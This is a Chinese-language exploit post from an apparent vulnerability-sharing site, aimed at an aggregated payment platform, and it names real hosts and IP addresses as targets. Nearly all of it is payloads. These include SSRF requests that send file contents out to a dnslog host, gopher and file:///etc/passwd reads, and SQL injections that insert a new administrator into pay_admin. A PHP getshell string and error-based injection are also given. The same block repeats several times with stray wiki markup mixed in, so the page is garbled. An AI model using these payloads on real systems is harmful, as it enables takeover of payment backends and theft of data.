全版本聚合支付漏洞-棉花糖会员站

# 全版本聚合支付漏洞
http://47.104.233.93/Payment_Index_batchQuery

==SSRF==
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`

gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb

file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

==SQL注入添加管理員用戶==
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);–+

==SQL注入（需要代理賬戶==

index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);–+

insert into pay_admin (`id`,`username`,`password`,`groupid`) values (‘101′,’ok’,’7aa5e695be95cdd64a88410a64dfe2c1′,’1′);–+

http://vip.qhkjpay.cn/conn.php

==SQL注入(payload和上面相同)==
index.php?m=user&c=api&a=ajaxGetIndustry

==后台Getshell==
manage_System_base.html
‘,@copy($_REQUEST[x],$_REQUEST[c]),//

==SQL報錯注入（API支付)==
Pay_Pay_getSignkey?code=123*&merid=222

==CSRF添加管理員==

==Vul==

http://47.104.233.93/Payment_Index_batchQuery

==SSRF==
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`

file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

==SQL注入（需要代理賬戶==

insert into pay_admin (`id`,`username`,`password`,`groupid`) values (‘101′,’ok’,’7aa5e695be95cdd64a88410a64dfe2c1′,’1′);–+

http://vip.qhkjpay.cn/conn.php

==SQL注入(payload和上面相同)==
index.php?m=user&c=api&a=ajaxGetIndustry

==后台Getshell==
manage_System_base.html
‘,@copy($_REQUEST[x],$_REQUEST[c]),//

==SQL報錯注入（API支付)==
Pay_Pay_getSignkey?code=123*&merid=222

==CSRF添加管理員==

{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Warn1.png|50px]]
| 這個頁面存在爭議，因此頁面內容存在不確定性。
|}
|}

==Vul==

http://47.104.233.93/Payment_Index_batchQuery

==SSRF==
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`

file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

==SQL注入（需要代理賬戶==

insert into pay_admin (`id`,`username`,`password`,`groupid`) values (‘101′,’ok’,’7aa5e695be95cdd64a88410a64dfe2c1′,’1′);–+

http://vip.qhkjpay.cn/conn.php

==SQL注入(payload和上面相同)==
index.php?m=user&c=api&a=ajaxGetIndustry

==后台Getshell==
manage_System_base.html
‘,@copy($_REQUEST[x],$_REQUEST[c]),//

==SQL報錯注入（API支付)==
Pay_Pay_getSignkey?code=123*&merid=222

==CSRF添加管理員==

==Vul==
http://47.104.233.93/Payment_Index_batchQuery
==SSRF==
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`

file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

==SQL注入（需要代理賬戶）==
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);–+

insert into pay_admin (`id`,`username`,`password`,`groupid`) values (‘101′,’ok’,’7aa5e695be95cdd64a88410a64dfe2c1′,’1′);–+

http://vip.qhkjpay.cn/conn.php

==SQL注入(payload和上面相同)==
index.php?m=user&c=api&a=ajaxGetIndustry

==后台Getshell==
manage_System_base.html
‘,@copy($_REQUEST[x],$_REQUEST[c]),//

==SQL報錯注入（API支付)==
Pay_Pay_getSignkey?code=123*&merid=222

==CSRF添加管理員==

==Vul==

http://47.104.233.93/Payment_Index_batchQuery

==SSRF==

http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`




gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb




file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

==SQL注入添加管理員用戶==

index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+

==SQL注入（需要代理賬戶）==

index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+

insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+

http://vip.qhkjpay.cn/conn.php

==SQL注入(payload和上面相同)==

index.php?m=user&c=api&a=ajaxGetIndustry

==后台Getshell==

manage_System_base.html
',@copy($_REQUEST[x],$_REQUEST[c]),//

==SQL報錯注入（API支付)==

Pay_Pay_getSignkey?code=123*&merid=222

==CSRF添加管理員==

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

全版本聚合支付漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2用友NC-Cloud process SQL注入

3HertzBeat(赫兹跳动) 开源实时监控系统默认口令

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6Hisense-海信公交智能公交企业管理系统apply Sql注入

全版本聚合支付漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2用友NC-Cloud process SQL注入

3HertzBeat(赫兹跳动) 开源实时监控系统 默认口令

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6Hisense-海信公交智能公交企业管理系统apply Sql注入

3HertzBeat(赫兹跳动) 开源实时监控系统默认口令